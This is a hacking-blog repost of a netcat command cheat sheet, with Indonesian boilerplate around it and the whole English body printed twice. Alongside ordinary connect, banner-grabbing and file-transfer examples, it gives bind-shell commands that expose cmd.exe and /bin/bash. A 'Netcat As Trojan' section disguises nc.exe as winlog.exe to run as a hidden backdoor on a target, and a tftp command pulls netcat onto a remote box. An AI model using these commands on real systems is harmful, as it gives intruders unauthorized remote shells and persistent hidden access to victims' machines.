NETCAT MANUAL | COMMANDS
BackTrack
Hacking
Internet
RAT
Tools
Tricks and Tips
Tutorial
Website Hacking
Windows 7
Windows 8
Windows XP
Tidak ada komentar
2012 - Hallo sahabat Fx008z | Official Blogger, Pada Artikel yang anda baca kali ini dengan judul 2012, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan
Artikel BackTrack,
Artikel Hacking,
Artikel Internet,
Artikel RAT,
Artikel Tools,
Artikel Tricks and Tips,
Artikel Tutorial,
Artikel Website Hacking,
Artikel Windows 7,
Artikel Windows 8,
Artikel Windows XP, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.
Judul : NETCAT MANUAL | COMMANDS
link : NETCAT MANUAL | COMMANDS
Judul : NETCAT MANUAL | COMMANDS
link : NETCAT MANUAL | COMMANDS
2012
Hello GreenHackers...
In This Article We'll Discuss about NETCAT Commands & Use. For Those People Who Don't Know About NETCAT Must Read My Previous Post NETCAT | BEGINNER GUIDE ..
Okay So Let's Start..
Important Switches
- -d detach from console, stealth mode
- -e prog inbound program to exec [dangerous!!]
- -g source-routing hop point[s], up to 8
- -G num source-routing pointer: 4, 8, 12, ...
- -i secs delay interval for lines sent, ports scanned
- -l listen mode, for inbound connects
- -L listen harder, re-listen on socket close
- -n numeric-only IP addresses, no DNS
- -o file hex dump of traffic
- -p port local port number
- -r randomize local and remote ports
- -s addr local source address
- -t answer TELNET negotiation
- -u UDP mode
- -v verbose [use twice to be more verbose]
- -w secs timeout for connects and final net reads
- -z zero-I/O mode [used for scanning]
Netcat Connecting
Run nc in connectmode and connectto port 139
nc -p 31337 127.0.0.1139
Run nc in connectmode and connectto port 139 and give verbose display -v -v two times make more verbose
nc -v -v -p 31337 127.0.0.1 139
Run nc in connectmode and connectto port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139
Run nc in connectmode and connectto port 139 with TIMEOUT set to 5 and give verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139
Netcat Execute
-e Executesa program if netcat is compiledwith the – DGAPING_SECURITY_HOLE.
Nc.exe is compiled to execute when -e is used.
Example
nc-l -d -p 10000 -e cmd.exe or
nc-L -d -p 10000 -e cmd.exe
This will run nc in detached mode and listen on port 10000.
Netcat Listen
Use –L switch to reconnect to thesame NetCat sessions.
This way you can connect over and over to the sameNetcat process.
Example:
nc -l -p 53 -t -e cmd.exe
nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'
Netcat File Sending
To receive a file named newfile on the destination system start netcat with the following command:
nc –l –p 1234 >newfile
On the source system send a file named newfile to the destination system with the following command:
nc destinationIP 1234 < newfile
Netcat Banner Grabbing
nc –vvn hostIP 80
nc –vvn hostIP 8080
Once connected type HEAD / HTTP/1.0 [Hit enter twice]
nc -v www.website.com 80 < get.txt
Checking WEB Header.
Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket"GET / HTTP/1.0\n\n";
echo "blahblahblah" | nc hostIP 80 > default.htm
cat get.txt| nc hostIP 80
Netcat Web Banner Grabber
First File is a text file:
----- begin get.txt -----
GET | / HTTP/1.0 | ||
HIT | ENTER IN YOUR | EDITOR | |
HIT | ENTER IN YOUR | EDITOR |
----- end get.txt -----
The second file is a batch file:
----- begin getweb.cmd -----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt
----- end getweb.cmd -----
You run it like this: getweb.cmd www.someweb.com
Netcat Finger & Telnet
Netcat as a simplefinger client:
nc -v hostIP 79 < user.txt
The file “user.txt contains the username you are interested in.
You can also send the output to a log file.
nc -v hostIP 79 < user.txt > log.txt
Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23
Netcat Simple Server
To create a simple server
nc -l -p 1234 < file
A very simple web server
nc -L -d -p 80 < file
A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe
Netcat As Trojan
We will use –t switch to answer telnet negotiation. Netcat should be compiledwith –DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe and/ornc-L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe= nc.exe)
Connect to your trojan using
nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat on a remote box using tftp
tftp –i remoteip GET nc.exe
This Is Just Some Commands of Netcat to show the power and Versatility of Netcat. I Found This article from the web Written By Adonis a.K.a. NtWaK0..
Enjoy Friends With NETCAT.... @@@@@@@
Hello GreenHackers...
In This Article We'll Discuss about NETCAT Commands & Use. For Those People Who Don't Know About NETCAT Must Read My Previous Post NETCAT | BEGINNER GUIDE ..
Okay So Let's Start..
Important Switches
- -d detach from console, stealth mode
- -e prog inbound program to exec [dangerous!!]
- -g source-routing hop point[s], up to 8
- -G num source-routing pointer: 4, 8, 12, ...
- -i secs delay interval for lines sent, ports scanned
- -l listen mode, for inbound connects
- -L listen harder, re-listen on socket close
- -n numeric-only IP addresses, no DNS
- -o file hex dump of traffic
- -p port local port number
- -r randomize local and remote ports
- -s addr local source address
- -t answer TELNET negotiation
- -u UDP mode
- -v verbose [use twice to be more verbose]
- -w secs timeout for connects and final net reads
- -z zero-I/O mode [used for scanning]
Netcat Connecting
Run nc in connectmode and connectto port 139
nc -p 31337 127.0.0.1139
Run nc in connectmode and connectto port 139 and give verbose display -v -v two times make more verbose
nc -v -v -p 31337 127.0.0.1 139
Run nc in connectmode and connectto port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139
Run nc in connectmode and connectto port 139 with TIMEOUT set to 5 and give verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139
Netcat Execute
-e Executesa program if netcat is compiledwith the – DGAPING_SECURITY_HOLE.
Nc.exe is compiled to execute when -e is used.
Example
nc-l -d -p 10000 -e cmd.exe or
nc-L -d -p 10000 -e cmd.exe
This will run nc in detached mode and listen on port 10000.
Netcat Listen
Use –L switch to reconnect to thesame NetCat sessions.
This way you can connect over and over to the sameNetcat process.
Example:
nc -l -p 53 -t -e cmd.exe
nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'
Netcat File Sending
To receive a file named newfile on the destination system start netcat with the following command:
nc –l –p 1234 >newfile
On the source system send a file named newfile to the destination system with the following command:
nc destinationIP 1234 < newfile
Netcat Banner Grabbing
nc –vvn hostIP 80
nc –vvn hostIP 8080
Once connected type HEAD / HTTP/1.0 [Hit enter twice]
nc -v www.website.com 80 < get.txt
Checking WEB Header.
Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket"GET / HTTP/1.0\n\n";
echo "blahblahblah" | nc hostIP 80 > default.htm
cat get.txt| nc hostIP 80
Netcat Web Banner Grabber
First File is a text file:
----- begin get.txt -----
GET | / HTTP/1.0 | ||
HIT | ENTER IN YOUR | EDITOR | |
HIT | ENTER IN YOUR | EDITOR |
----- end get.txt -----
The second file is a batch file:
----- begin getweb.cmd -----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt
----- end getweb.cmd -----
You run it like this: getweb.cmd www.someweb.com
Netcat Finger & Telnet
Netcat as a simplefinger client:
nc -v hostIP 79 < user.txt
The file “user.txt contains the username you are interested in.
You can also send the output to a log file.
nc -v hostIP 79 < user.txt > log.txt
Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23
Netcat Simple Server
To create a simple server
nc -l -p 1234 < file
A very simple web server
nc -L -d -p 80 < file
A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe
Netcat As Trojan
We will use –t switch to answer telnet negotiation. Netcat should be compiledwith –DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe and/ornc-L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe= nc.exe)
Connect to your trojan using
nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat on a remote box using tftp
tftp –i remoteip GET nc.exe
This Is Just Some Commands of Netcat to show the power and Versatility of Netcat. I Found This article from the web Written By Adonis a.K.a. NtWaK0..
Enjoy Friends With NETCAT.... @@@@@@@